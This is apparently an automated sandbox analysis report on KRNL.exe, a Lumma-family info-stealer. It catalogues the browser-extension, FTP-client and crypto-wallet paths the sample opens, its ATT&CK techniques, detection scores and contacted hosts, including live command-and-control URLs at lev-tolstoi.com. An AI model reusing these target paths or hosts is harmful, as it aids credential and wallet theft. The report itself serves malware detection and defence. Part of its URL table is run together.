                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflа
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Roaming\FTPbox
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Roaming\FTPRush
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
                    Source: Yara matchFile source: 00000002.00000003.1751845531.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: KRNL.exe PID: 2120, type: MEMORYSTR

                    Remote Access Functionality

Source: Yara match, File source: Process Memory Space: KRNL.exe PID: 2120, type: MEMORYSTR
Source: Yara match, File source: 2.2.KRNL.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 2.2.KRNL.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.1676084823.00000000043BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: sslproxydump.pcap, type: PCAP
Source: Yara match, File source: decrypted.memstr, type: MEMORYSTR
MITRE ATT&CK Matrix (one line per tactic column, techniques listed top to bottom; a leading number is the count shown in the report next to a matched technique)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 12 Windows Management Instrumentation; 1 Native API; 1 PowerShell; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: 1 DLL Side-Loading; 211 Process Injection; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: 11 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading; 21 Virtualization/Sandbox Evasion; 211 Process Injection; Compile After Delivery; Indicator Removal from Tools
Credential Access: 2 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 1 System Time Discovery; 12 File and Directory Discovery; 33 System Information Discovery; 1 Query Registry; 241 Security Software Discovery; 21 Virtualization/Sandbox Evasion; 1 Process Discovery; 1 Application Window Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: 1 Archive Collected Data; 41 Data from Local System; 1 Screen Capture; 3 Clipboard Data; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: 1 Ingress Tool Transfer; 21 Encrypted Channel; 3 Non-Application Layer Protocol; 114 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Source | Detection | Scanner | Label
KRNL.exe | 40% | Virustotal |
KRNL.exe | 68% | ReversingLabs | Win32.Trojan.LummaC
KRNL.exe | 100% | Joe Sandbox ML |

No Antivirus matches
Source | Detection | Scanner | Label
https://steambroadcast-test.akamaizedk | 0% | Avira URL Cloud | safe
https://lev-tolstoi.com/k | 100% | Avira URL Cloud | malware
https://lev-tolstoi.com/apiul | 100% | Avira URL Cloud | malware
https://lev-tolstoi.com/pi# | 100% | Avira URL Cloud | malware
https://login.steampK | 0% | Avira URL Cloud | safe
https://help.st | 0% | Avira URL Cloud | safe
https://lev-tolstoi.com/m/S | 100% | Avira URL Cloud | malware
https://checkout.steampow | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
steamcommunity.com | 104.102.49.254 | true | false | | high
lev-tolstoi.com | 172.67.157.254 | true | false | | high
cashfuzysao.buzz | unknown | unknown | false | | high
scentniej.buzz | unknown | unknown | false | | high
inherineau.buzz | unknown | unknown | false | | high
prisonyfork.buzz | unknown | unknown | false | | high
206.23.85.13.in-addr.arpa | unknown | unknown | false | | high
rebuildeso.buzz | unknown | unknown | false | | high
appliacnesot.buzz | unknown | unknown | false | | high
hummskitnj.buzz | unknown | unknown | false | | high
mindhandru.buzz | unknown | unknown | false | | high
screwamusresz.buzz | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
scentniej.buzz | false | | high
https://steamcommunity.com/profiles/76561199724331900 | false | | high
rebuildeso.buzz | false | | high
appliacnesot.buzz | false | | high
screwamusresz.buzz | false | | high
cashfuzysao.buzz | false | | high
inherineau.buzz | false | | high
https://lev-tolstoi.com/api | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png | KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/chrome_newtab | KRNL.exe, 00000002.00000003.1711060415.0000000005A8C000.00000004.00000800.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1711461120.0000000005A89000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://player.vimeo.com | KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | KRNL.exe, 00000002.00000003.1711060415.0000000005A8C000.00000004.00000800.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1711461120.0000000005A89000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp | KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://steamcommunity.com/?subsection=broadcasts | KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://lev-tolstoi.com/s | KRNL.exe, 00000002.00000003.1765127023.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1821721499.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1751845531.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1976733332.00000000033E3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000002.2915949204.00000000033E4000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417. | KRNL.exe, 00000002.00000003.1738159372.0000000005A44000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://store.steampowered.com/subscriber_agreement/ | KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.gstatic.cn/recaptcha/ | KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690264373.000000000338C000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://cdn.fastly. | KRNL.exe, 00000002.00000003.1699717842.0000000003383000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://steambroadcast-test.akamaizedk | KRNL.exe, 00000002.00000003.1699717842.0000000003383000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.valvesoftware.com/legal.htm | KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en | KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.youtube.com | KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1710350446.0000000003383000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690264373.000000000338C000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.google.com | KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1710350446.0000000003383000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690264373.000000000338C000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi | KRNL.exe, 00000002.00000003.1738159372.0000000005A44000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback | KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6 | KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699633987.000000000333A000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ | KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690264373.000000000338C000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://lev-tolstoi.com/k | KRNL.exe, 00000002.00000003.1765127023.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1821721499.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1976733332.00000000033E3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000002.2915949204.00000000033E4000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl | KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis | KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC | KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://s.ytimg.com; | KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1710350446.0000000003383000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690264373.000000000338C000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRi | KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699633987.000000000333A000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1 | KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1710324005.00000000033DD000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699633987.000000000333A000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english& | KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/ | KRNL.exe, 00000002.00000003.1690264373.000000000338C000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://steam.tv/ | KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1710350446.0000000003383000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690264373.000000000338C000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94 | KRNL.exe, 00000002.00000003.1738159372.0000000005A44000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en | KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.entrust.net/rpa03 | KRNL.exe | false | | high
https://lev-tolstoi.com/ | KRNL.exe, 00000002.00000002.2915949204.00000000033E4000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://store.steampowered.com/privacy_agreement/ | KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1710324005.00000000033DD000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699633987.000000000333A000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://lev-tolstoi.com/m/S | KRNL.exe, 00000002.00000003.1699633987.0000000003342000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://store.steampowered.com/points/shop/ | KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | KRNL.exe, 00000002.00000003.1711060415.0000000005A8C000.00000004.00000800.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1711461120.0000000005A89000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.rootca1.amazontrust.com/rootca1.crl0 | KRNL.exe, 00000002.00000003.1737060730.0000000005A76000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta | KRNL.exe, 00000002.00000003.1738159372.0000000005A44000.00000004.00000800.00020000.00000000.sdmp | false | | high
                                                                                                                                      http://ocsp.rootca1.amazontrust.com0:KRNL.exe, 00000002.00000003.1737060730.0000000005A76000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://lev-tolstoi.com/pi#KRNL.exe, 00000002.00000003.1765127023.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1821721499.00000000033CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                        unknown
                                                                                                                                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016KRNL.exe, 00000002.00000003.1723581632.0000000005A98000.00000004.00000800.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1712083330.0000000005A9F000.00000004.00000800.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1712222118.0000000005A98000.00000004.00000800.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1723494603.0000000005A98000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&aKRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://sketchfab.comKRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://www.ecosia.org/newtab/KRNL.exe, 00000002.00000003.1711060415.0000000005A8C000.00000004.00000800.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1711461120.0000000005A89000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://lv.queniujq.cnKRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1710350446.0000000003383000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690264373.000000000338C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://steamcommunity.com/profiles/76561199724331900/inventory/KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699633987.000000000333A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brKRNL.exe, 00000002.00000003.1737899780.0000000005B5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://www.youtube.com/KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1710350446.0000000003383000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690264373.000000000338C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://store.steampowered.com/privacy_agreement/KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=engKRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://support.microsofKRNL.exe, 00000002.00000003.1712083330.0000000005AA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&amKRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://www.google.com/recaptcha/KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690264373.000000000338C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://checkout.steampowered.com/KRNL.exe, 00000002.00000003.1690264373.000000000338C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://login.steampKKRNL.exe, 00000002.00000003.1699717842.0000000003383000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesKRNL.exe, 00000002.00000003.1712222118.0000000005A73000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://help.stKRNL.exe, 00000002.00000003.1699717842.0000000003383000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      http://crl.entrust.net/2048ca.crl0KRNL.exefalse
                                                                                                                                                                        high
                                                                                                                                                                        https://store.steampowered.com/;KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://www.entrust.net/rpa0KRNL.exefalse
                                                                                                                                                                            high
                                                                                                                                                                            https://store.steampowered.com/about/KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://steamcommunity.com/my/wishlist/KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  http://ocsp.entrust.net03KRNL.exefalse
                                                                                                                                                                                    high
                                                                                                                                                                                    http://ocsp.entrust.net02KRNL.exefalse
                                                                                                                                                                                      high
